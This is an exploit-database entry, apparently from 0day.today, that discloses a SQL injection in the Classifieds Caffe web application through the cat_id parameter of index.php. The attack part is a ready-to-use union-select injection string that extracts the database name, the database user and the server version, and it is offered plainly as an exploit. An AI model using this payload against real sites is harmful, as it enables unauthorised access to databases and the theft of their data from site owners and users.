Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability

2008-04-15T00:00:00
ID 1337DAY-ID-2884
Type zdt
Reporter JosS
Modified 2008-04-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Classifieds Caffe (index.php cat_id) SQL Injection Vulnerability
================================================================



[+] Info:

[~] Software: Classifieds Caffe
[~] Exploit: Remote SQL Injection [High]
[~] Where: index.php
[~] Bug Found By: JosS


[+] Exploit:

[~] /index.php?action=add&cat_id=[SQL]
[~] 7'+union+all+select+0,1,convert(concat(database(),char(58),user(),char(58),version()),char),3/*



#  0day.today [2018-01-01]  #